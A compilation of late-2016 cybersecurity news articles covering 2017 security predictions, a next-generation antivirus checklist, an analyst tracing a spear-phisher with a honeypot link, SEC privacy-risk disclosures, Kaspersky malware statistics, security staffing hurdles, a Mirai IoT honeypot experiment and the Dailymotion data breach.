As organizations adopt more effective strategies to defeat malware, attackers will shift their approach and start to use legitimate credentials and software - think physical insiders, credential theft, man-in-the-app. The increased targeting of social media and personal email bypasses many network defenses, like email scans and URL filters. The most dangerous aspect is how attackers manipulate victims with offers or threats that they would not want to present to an employer, like employment offers or illicit content. Defenders will begin to appreciate that inconsistent user behaviors are the most effective way to differentiate malware and insider threats from safe and acceptable content.

SEE: Threat intelligence: Forewarned is forearmed (Tech Pro Research)

A big part of the challenge with cyberattacks is how businesses think threats can be filtered at the perimeter. Be warned that this is not the case. Attackers are aware of how to directly target users and endpoints using social engineering. The industry needs to be more proactive in thinking about how to reduce the attack surface, as opposed to chasing known threats and detecting millions of unknown threats. With an increasingly mobile workforce and threats coming through both personal and business devices and services, the impact of perimeter defenses has decreased. Security needs to be built from the endpoint outwards.

Business security spending will increase - Ed Solis, Director of Strategy & Business Development at CommScope

Security is part of every business and IT discussion these days and it will only become more intense in 2017. We see an increase in the demand for video for surveillance, both for government and private businesses. This issue includes physical security—securing the building, people, and assets—as well as network and data security... In 2017, security conversations will continue to intensify around not only securing data and networks but physical security as well-think buildings, people, and assets. We also expect to see an increased demand for video surveillance across the public sector and private business.

SEE: Cybersecurity spotlight: The ransomware battle (Tech Pro Research)

Security will no longer be an afterthought - Signal Sciences' Co-Founder & Chief Security Officer, Zane Lackey

2017 will be a critical year for security, starting with how it's built into technology. DevOps and security will change the way they work together as they realize the need to integrate with each other in order to survive. With IoT on the rise, security will continue to be the primary obstacle preventing consumers from fully welcoming connected devices into their homes and lifestyles. Consumers and businesses are getting smarter and security vendors will be held more accountable in keeping them safe.



When Antivirus Fails, what to chose to help

From: Securitybrief NZ by: Kane Lightowler

The ineffectiveness of traditional antivirus (AV) , which catches less than half of noteworthy malicious events, is causing untold damage to organisations worldwide. The harm is unnecessary as next-generation antivirus (NGAV), the natural evolution of AV, will protect computers from the full spectrum of modern cyber attacks.

So let us re-think endpoint defences and provide a checklist of items to consider while making the decision to transition to NGAV.

Traditional antivirus was designed and built before the cybercrime explosion, and the speed at which tools and techniques are now changing. Modern attacks often utilise techniques that leverage built-in tools and scripts, much different from the days where attacks were almost always malicious binaries.

Beyond considering the kinds of attacks, organisations need the ability to protect themselves quickly rather than waiting for their vendor to push out signatures, hoping that the endpoints receive an update before that malicious email lands in employees’ inboxes.

To reduce cyber risk, IT needs an endpoint-security approach that goes beyond malware and incorporates next-generation features that target the tactics, techniques and procedures frequently used by both mass scale opportunistic attackers and advanced threats specifically targeting an organisation.

The following checklist will help IT to assess the capabilities of a current antivirus solution and provide guidance for migrating to a more mature posture. While an organisation might have unique requirements or constraints, the list will ease their shift to next-generation anti-virus.

#1 Full range of protection

Modern attackers generate malware faster than traditional AV stops it. They are mastering techniques that don’t even require malware. An endpoint security solution should protect against all attacks, not just threats that involve running a malicious executable. Beyond the initial execution blocks, there should be strong protection against particularly useful adversarial techniques like thread injection and ram scraping.

In evaluating an NGAV solution, make sure it protects against:

Known malware and variants including malware-based ransomware Obfuscated, evasive or previously unknown malware Compromised (exploited) legitimate software (Flash, Silverlight, etc) Malicious scripts and interpreted code like PowerShell, Visual Basic, Perl, Python, Java Memory-resident and file-less attacks Document-based attacks (PDFs and macros) Remote login attacks and the malicious use of valid software (living off the land).

#2 Extensible cloud security intelligence and analytics

As attackers evolve and adapt their tactics and techniques, organisations need to employ new analytic capabilities and attack intelligence to properly defend themselves – without having to redeploy security infrastructure. An NGAV should feature:

A cloud backend for high-powered analysis and the application of vendor intelligence Multiple inspection engines that focus on reputation, behaviour, and event relationships Configurable detection sensitivities to prioritize important events and reduce unnecessary alerting Open and extensible threat feeds for third-party attack intelligence and for leveraging security investments already made Community-based intelligence sharing and the network effect of benefiting from attacks other users witness. **

#3 Visibility and context into attack and detection events**

After an attack attempt, IT needs to understand what happened so they can contain and control the situation, prevent further damage and improve the overall security posture. The right context helps to do all that quickly and easily. If each attack doesn’t make for stronger defence, we recommend a reconsideration of IT’s approach. An NGAV solution should provide:

Insight into how the threat started, even before it was detected (root cause) Visibility into where else in the organisation this threat might exist (scope) Guidance on what’s needed to recover and how to close gaps (education and maturity) Data sharing data within the ecosystem (SIEM, etc) (integration and automation).

#4 Integrated rapid-response

Not every attack can be prevented. Skilled attackers can use stolen credentials and native system tools such as PowerShell to infiltrate a machine without using malware. These attacks can still be detected, and when they are IT needs to be able to respond quickly.

An NGAV solution should make it easy to: delete malware or temporary files across the organisation; stop network activity for a specific process; quarantine a system and isolate it from the network; and blacklist files from executing anywhere in the environment.

#5 Lightweight operations

We have all experienced antivirus grinding our computer to a halt while it scans the drive. Thankfully, those days are gone. Next-generation antivirus should be lightweight on the system and easy to administer so it doesn’t slow users down.

#6 A platform that grows with assets, users, systems and teams

Different assets require different strategies for protection. Servers, for example, don’t change often and have highly restrictive protection policies. Meanwhile, developers need more flexibility. A solution should adapt to the organisation’s needs and be part of a platform that provides a growth path to a better security posture over time.

An NGAV should be part of a platform that provides: group-based policy that applies different security strategies to different systems; an upgrade path to advanced incident response and threat hunting for SOCs and IR teams; an upgrade path to default-deny and lockdown policies for sensitive or high-risk systems; and an upgrade path to app control, device control, and file integrity monitoring for servers and critical systems.



How an analyst targeted a Phisher, and how to respond to Ransomware

From: CSO online by: Ryan Francis

Not unlike any other threat analyst, Marc Laliberte's email inbox fills up minute by minute. Some of which has made its way past the spam filter. The WatchGuard employee decided to finally act upon a certain phishing attempt in hopes of teaching the bad guys a lesson.

Spear phishing is a type of phishing attack in which the perpetrator customizes their attack to a particular individual or group of individuals. The attacker gathers information on the victim and then tailors the attack to be more likely to fool the target. The would-be attack arrived as an email appearing to come from the finance employee’s manager, requesting an urgent wire transfer.

Thanks to proper security awareness training, the finance employee recognized that the email’s blatant disregard for the official chain of command and finance protocols was suspicious and alerted the proper personnel.

How to respond to ransomware threats In most cases, companies don't have the time or resources to follow the bread crumbs back to the perpetrator. But in this case Laliberte set out to learn as much as he could by playing along with the attacker. He responded to the first email and the attacker replied, asking “the finance employee” to contact them via text to a phone number the attacker claimed was the manager’s personal line.

The email’s source address was a seemingly random seven-digit number at The attacker didn’t try to spoof the message to make it appear to come from a WatchGuard account. Instead, the attacker relied on the message’s “From:” header to fool the target. Most mail clients use the “From:” header to display who a message came from, and often the client only shows a sender’s first and last name. In this phishing email, the “From:” header showed the WatchGuard manager’s first and last name, which might convince uninformed employees that the message really did come from that manager.

Laliberte did some digging and found that the phone number provided by the attacker was registered as a landline through Level 3 Communications with an area code matching Jacksonville, Fla. He suspected that the attacker probably was never physically located in Jacksonville, instead, he likely used a forwarding service to send and receive text messages through this number. Attackers commonly leverage the global nature of internet and telephony services to hide the true location of their attacks.

Laliberte texted the attacker using a disposable phone number. A day later, the attacker replied and quickly got to the point, requesting an urgent fund transfer as payment for a shipment of WatchGuard Fireboxes arriving the following week. He kept the attacker on the hook by alluding that a money transfer was possible and asked for further details.

The attacker asked for a wire transfer of $20,000 to a man he claimed was in New York. Some quick research revealed that there were no fraud references related to the provided name. The attacker also sent account and routing numbers for the wire transfer itself. While providing bank account details adds legitimacy to transactions, it also increases the authorities’ ability to track payments in fraud investigations, making it risky for attackers to do. It appeared that the account details provided likely belonged to a compromised account that the attacker could quickly transfer money out of.

At this point, Laliberte had gathered all of the information the attacker would voluntarily share, but still had no clear picture of where he was located. However, the attacker did expect a wire transfer confirmation message. He masked the IP address (as seen below) of a honeypot server behind a URL-shortener and sent it to the attacker disguised as a confirmation link.

* - - [22/Apr/2016:22:25:06 +0000] "GET /verify HTTP/1.1" 404 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1"
When the attacker visited the link, it redirected him to the honeypot server where Laliberte logged his source IP and browser User-Agent data. The attacker’s source IP was registered to Airtel Networks Limited, a mobile Telco out of Nigeria. The User-Agent data told Laliberte that the attacker was connected to the honeypot using an iPhone running iOS 9.3.1. This confirmed the hypothesis that the attacker was using a forwarding service to receive text messages through the Jacksonville phone number.

Though the attacker was in Nigeria, he used a bank account (TD Bank) that required a permanent US address, meaning the account was either compromised or the attacker had an accomplice in the US (often called a mule) who could retrieve any transferred money. Laliberte contacted TD Bank to allow them to begin an investigation on attempted fraud by someone with access to the provided account.

This spear phishing attempt makes it clear just how big of a problem these attacks are today. No spear phishing protection is perfect. Even with technological solutions like DMARC or S/MIME, phishing messages will still slip through and reach employees, he said. It is critical that IT professionals train their users on how to spot and report attempted phishing attacks. With the growth of spear phishing, organizations need to update their training programs to help employees learn how to spot these more convincing, targeted email scams.



Corporations Cite Reputational Damage as Biggest Cyber Risk

From: Dark Reading by: Kelly Sheridan

New data analyzing SEC disclosures found 83% of publicly traded companies worry most about the risk of brand damage via hacks exposing customer or employee information.

Public businesses fear the possibility of losing customer or employee's personally identifiable information (PII) and the subsequent brand-damage fallout more so than other risks, a new study published by the International Association of Privacy Professionals (IAPP) found.

The IAPP Westin Research Center studied US Securities and Exchange Commission (SEC) Form 10-K disclosure statements from more than 100 publicly traded companies. The forms are where businesses share risk factors that could prove concerning to investors.

The chief privacy officers, chief legal counsel, and other experts in privacy and privacy law on IAPP's research advisory board were struggling to quantify privacy risk for their companies and clients. IAPP decided to study this via the SEC disclosures, according to IAPP research director Rita Heimes.

"It's tough to come up with a value for privacy risk," she explains. "We decided to determine whether companies think [privacy] is a risk to the bottom line, and provide more definition that way."

Among the companies that disclosed privacy risk, 83% cited reputational harm as the top digital risk factor. This surpassed civil litigation (60%), regulatory enforcement (51%), and remediation (50%). Less than half (43%) cited the risk of failing to comply with privacy laws and regulations.

Brand damage causes more immediate damage than lawsuits, which can drag on for long periods of time.

"Trust is the biggest threat because it applies to both the employee and the customer, depending on whose data is being misused or exposed," Heimes says. "Once that trust factor is undermined, it can have a ripple effect, leading to financial harm, embarrassment, or drop in employee retention."

Another risk factor is loss of corporate resources, Heimes continues. Anytime someone mishandles personal data, it takes a lot of time away from business operations and as a result, employees have to work on planning recovery and preventing future incidents.

One in five companies warns investors that if it becomes the victim of a data breach, the liability could exceed insurance coverage. The same amount say an attack could distract management, and other employees, from their core business responsibilities.

The fear of privacy risk varies across industries, says Heimes. Businesses offering products known for being secure, like software, operating systems or cloud services, run a tremendous risk if personal information is lost.

"If their products are vulnerable to attack and data can be easily mishandled, that makes the product or service inherently less valuable," she explains. "We perceived technology companies and social media platforms as being far more likely to write elaborate, sophisticated, and knowledgeable privacy disclosures" compared with organizations like energy companies, which are more concerned with system failure.

Heimes says she was surprised there wasn't greater unease about the role of vendors and other third parties in using PII. Less than half (47%) of respondents were concerned about information mishandling by business partners, vendors, and other organizations.

"There was less mention of third parties disclosing data than I think is reflective of reality," she notes. "This is significant and many companies have begun to step up paying attention to how vendors handle their data."

That is likely to change over time, however, she notes.

There are steps businesses can take to mitigate the risk of information loss, she says. It's not enough to simply buy software tools; the human factor is most important.

Investing in people and helping them understand privacy best practices can prevent the misuse of PII. The workers who collect, store, and make decisions about how to handle user data need to be aware of privacy issues and make informed choices, Heimes says.



323k Malware Files Are Detected Daily

Ever wonder how much malware is being detected daily? In 2016, that number is 323,000 as detected by Kaspersky Lab.

This is an increase of 13,000 from the amount in 2015, and a significant jump from the 70,000 files per day identified in 2011.

“We determined this year’s malware growth was mostly caused by a huge increase in the number of downloaders distributed via email,” said Vyacheslav Zakorzhevsky, head of the anti-malware team at Kaspersky Lab. “In most cases these downloaders deliver ransomware on the attacked machines. In 2016, the number of these malicious programs was 3.6 times bigger than in 2015—the result of a cybercriminal’s efforts to hide malware from detection by security solutions. In addition, our constantly improving machine-learning technologies allow us to detect and discover even unknown threats.”

Woburn, MA – December 6, 2016 – According to Kaspersky Lab, the number of new malware files detected by its products in 2016 increased to 323,000 per day. This is an increase of 13,000 from the amount in 2015, and a significant jump from the 70,000 files per day identified in 2011.

The Kaspersky Lab cloud malware database, includes discoveries by Astraea—a machine-learning based malware analysis system working inside the Kaspersky Lab infrastructure. Over a fifth of the malicious objects included in the cloud database were discovered and identified as malicious by Astraea. The database now carries a billion malicious objects, including viruses, Trojans, backdoors, ransomware and advertisement applications and their components.

The percentage of malware discovered and added automatically to the Kaspersky Lab cloud database by Astraea has been growing steadily over the last five years: from 7.53 percent in 2012, to 40.5 percent in December 2016. The proportion is growing in line with the number of new malicious files discovered daily by Kaspersky Lab experts and detection systems. This has increased from 70,000 files per day in 2011 to 323,0001 per day in 2016.

“One billion unique malicious files is a remarkable milestone. It shows the scale of the cyber-criminal underground, which has developed from several small forums offering customized malicious tools, to the mass production of malware and tailored cyber-criminal services,” said Zakorzhevsky. “It also highlights the quality and evolution of our automated malware analysis technologies. Out of these billion files, more than 200 million have been added by the Astraea machine-learning system. Our advanced systems now not only detect the vast majority of known malware we get on a daily basis, but also discover unknown threats. Although the remaining 800 million files have been added by other internal detection systems, or by experts, the contribution to the Kaspersky Lab cloud database by machine-learning systems is substantial and will continue to grow.”



3 Cybersecurity Hurdles to overcome in 2017

From SC Mag by: Ben Johsnon

Every month, cyber attacks seem to whiplash back to center stage. There are dozens of headlines at any given moment that should be catalysts for cybersecurity change. But things do not change and, in fact, they may be getting worse. Let's look at the top three negative forces making security harder going into 2017.

The Talent Deficit

Whether you think there aren't enough people to fill the open information-security jobs, or you don't think there are enough already qualified candidates, we're in the midst of cyber battles and today's ranks of capable soldiers are thin.

We need more talent, more hungry professionals who want “to fight the bad guys.” And it's not that this is AN issue, but it is THE issue. Security is still a human problem and will be for the foreseeable future. Without enough security teammates, what chance do we have?


Most teams are not lacking for technology. Intrusion detection, anti-virus, SIEM, detonation, get the point. What's discouraging, though, is the amount of time and money spent on obtaining a new product or platform, and then seeing that new purchase either sit on the shelf or get deployed and decay over time. From the time products are purchased, they seem to diminish in value. While there are instances where teams are truly leveraging technology to improve their defenses, the vast majority of teams are getting nowhere near the value from their tech stack they believed they would during demos. Why is this the case?

The first reason is awareness. In my discussions, security teams don't seem to recognize the deploy-and-decay problem until it is really a big problem. It's like ignoring your health until you're in dire pain, or ignoring your teeth until your tooth falls out and then saying maybe you should brush.

The talent deficit contributes to this because there aren't enough available human hours to go back and provide that care and feeding to the tech stack. And technologies themselves are not “self-healing” or “auto-tuning” to a level that would rid this task of the human cyber defenders.

Lack of Cyber Self-Esteem

Why is there a lack of cyber self-esteem? Environments are complex; culture is often more about clicking links than reporting them; CISOs have to fight for budget; and security controls get bypassed as soon as they have the perception of slowing down productivity. And, as was just mentioned, there aren't enough people and the security stack has cavities. Sounds fun, doesn't it?

It's depressing when I see teams that don't have confidence in leadership, or leadership that doesn't have confidence in the team. While I sincerely empathize, it's frustrating because I know these teams and these individuals are capable of so much more.

Is there Cyber Hope?

Teams are doing a lot of great things. Automation is empowering teams to be more effective. Creative-types and engineers are moving parts of the industry forward. There's a lot to celebrate. So what should you focus on?

  1. Train and retain
  2. Recruit
  3. Optimize your use of tools (and tune them)
  4. Celebrate quick or easy wins and iterate

You must make sure your team is capable and then make sure they stay. Plain and simple. I've said it before, but make items like threat hunting, or tech tuning perks, and find other ways to make it fun. Teach your team python and let them learn other new skills. Security has so much room for creativity and innovation -- let your team capture that.

Beyond your existing team, you need a pipeline of candidates. We're in the unfortunate state where security programs should be continually recruiting, continually trying to build their talent pipeline. It's hard to enough to find and hire someone, and you will most likely not ever have more rockstars than positions. So get out there and recruit. In line with making sure your team is happy and trying to fill the ranks, part of making them happy will be optimizing their use of tech. Focus on fewer tools and really make sure closer to 100% of the potential value is being realized. Dive deep in the rule creation or the API usage. Leverage data sets in different ways. You'll find you don't need as many tools if you do it right.

Finally, you need to celebrate, both internally to the security team and throughout your company when there's a win. Celebrate that employee who reported a phishing attack. Let your team blog or disclose some neat piece of ransomware they found and dissected. Through sharing and other means your team can build up their own brands and make friends in the process. But the best part will be the celebration of these different accomplishments, like reducing mean-time-to-detect or mean-time-to-respond. Security can be really fun and you should aim for that.

If you start taking some of these steps, even an inch at a time, you have a chance at moving your program forward. You may have to fight for that inch, but you it moves you forward nonetheless. We cannot give up, we cannot let our technology only operate at 10 percent of its possible value, and we cannot let our teams think they have no chance. Our cyber resiliency will only exist if we start reducing these counter-productive forces on security. Let's make 2017 a better year than 2016, and we can start by overcoming these security hurdles.



Getting Serious about IoT Security

From: Dark Reading by: Troy Dearing

The Department of Homeland Security is fully justified in urging security standards for the Internet of Things. In an effort to curtail a new and disturbing cyberattack trend, the Department of Homeland Security has placed Internet of Things (IoT) device manufacturers on notice. The recent proclamation clarified how serious the agency is about the issue and how serious it wants corporate decision makers to be. In short, the DHS "Strategic Principles for Securing the Internet of Things" acknowledges the gravity of the current climate and the potential for greater harm by encouraging security to be implemented during the design phase, complete with ongoing updates based on industry best practices.

How this effort could affect upcoming product releases is yet to be seen, but these questions remain: How secure must products be before delivery to consumers? Will the liability of insecure Web devices translate to a burden for consumers unaware of proper security? This uncertainty could cause problems for those who produce or use IoT devices.

This move by the DHS was necessary. The recent Dyn DDoS attack made the susceptibility of these devices clear, and the sheer destructive potential makes the risks impossible to ignore.

An IoT Experiment To determine the severity of the problem, I wanted to see how quickly an IoT device would be attacked once it was connected to the Internet. Would a user who bought an IoT webcam or printer have enough time to set up and securely configure the device before an attacker would compromise the device?

To help me answer this question, I had a couple of choices; I could purchase an insecure IoT device and monitor the activity targeting it, or I could configure a virtual device that would appear to an attacker to be a vulnerable IoT device fresh out of the box. This technique of luring attackers to monitor their efforts and techniques is known as a honeypot. Researchers have been using honeypots for years to study the way attackers gain access to a vulnerable device, as well as what they do after the exploit. I opted for the honeypot route, but it had to be set up just right.

The vast majority of the devices targeted by Mirai are running a stripped-down version of the Linux operating system, developed for multiple architectures (MIPS, ARM, x86, etc.). These machines generally run a tool called BusyBox — "The Swiss Army knife of embedded Linux," as developers refer to it. This single binary allows for the execution of more than 300 commands, cutting down on the space required of an operating system on an embedded device. Space isn't an issue for a honeypot, but it was important to have executables that are used by the code we saw when Mirai was made public.

I opted for a Debian Linux distribution, with BusyBox available just in case. I configured the honeypot to have the same ports open that these devices generally have — 23 and 80. After the configuration was complete, including setting up the same credentials seen in the recent attacks, it was time to find out how long people would have to secure a new IoT device that was connected to the Internet.

It turns out they wouldn't have much time at all. In less than 10 minutes, the honeypot was hit with 13 brute force attacks. After an hour of being online, it had been attacked 551 times, with more than 10 unique attackers having interacted with the honeypot. I continued to monitor all activity for the rest of the week. When I finally shut down the honeypot, it had been subjected to 2,665 brute force attacks and more than 108 sessions where there was an attempt to gain access. Some of those sessions resulted in malware being downloaded.

The Evolution of Mirai The analysis of the malware wasn't what I expected. I was hoping to see the Mirai source code, but it was new code based on Mirai. It had only been a few days from the release of the source code and someone already had repurposed it and made minor tweaks — and here it was sitting on my IoT honeypot. This was a reminder that we shouldn't focus on a single signature when looking for follow-on attacks; if I had only looked for binaries that should have been downloaded by Mirai, I could have missed these new threats.

Based on my experiment, it's obvious that the DHS directive was needed. More must be done by device manufacturers to provide a modicum of security before release.

What Users Can Do Fortunately, there are ways to ensure that network devices stay under user control:

Change default passwords. The devices compromised by Mirai had default credentials still in place, many of which consisting of the username "admin" or "root," and the password "admin" or "password." Users should ensure that any device deployed to their network has the default password changed. Disable remote administration. By default, many devices allow for remote administration outside of the internal network. Administrative tasks should be performed internally if possible. Keep firmware up to date. Because of the recent attacks, manufacturers are expected to release firmware updates to products to close down security holes, preventing subsequent attacks. By default, these devices require user interaction to apply these firmware patches. Make sure that before installing the latest firmware you back up the current working firmware and have it locally in case the update fails, so you aren't left with a broken device.



85 Million Accounts exposed on Dailymotion

From: by: Steve Ragan

Breach notification service LeakedSource, announced on Monday that they have obtained 85.2 million records from Dailymotion, one of the largest video platforms on the Web. The compromised data consists of email addresses, usernames, and some passwords.

ZDNet confirmed that the data did come from the entertainment website, but representatives for Vivendi, the Paris-based majority owner of Dailymotion didn’t respond to comments.

LeakedSource says that the data was possibly compromised on October 20, meaning it is possible criminals have been circulating the data for some time. It wasn’t clear when LeakedSource obtained the records.

How to respond to ransomware threats While the email addresses and usernames are clearly visible in sample records seen by Salted Hash, only some of them have visible passwords (just over 18 million). Because Dailymotion used bcrypt to hash the passwords, cracking them will be more difficult than passwords that are hashed with SHA1 or MD5.

Such protection measures are a good thing, and help lower the impact of a data breach, but cracking bcrypt hashes isn’t impossible depending on the circumstances, as proven during the Ashley Madison incident. What bcrypt does is make the cracking process extremely slow, while requiring serious CPU power.

None of the email addresses in the sample list provided to Salted Hash responded to questions about the Dailymotion hack.

Last month, Salted Hash broke the story that 412 million FriendFinder Networks accounts were compromised, after LeakedSource provided additional details from the October incident. The compromised records were in six databases used on,,,, and

Since opening, LeakedSource has added nearly 3 billion records to its database.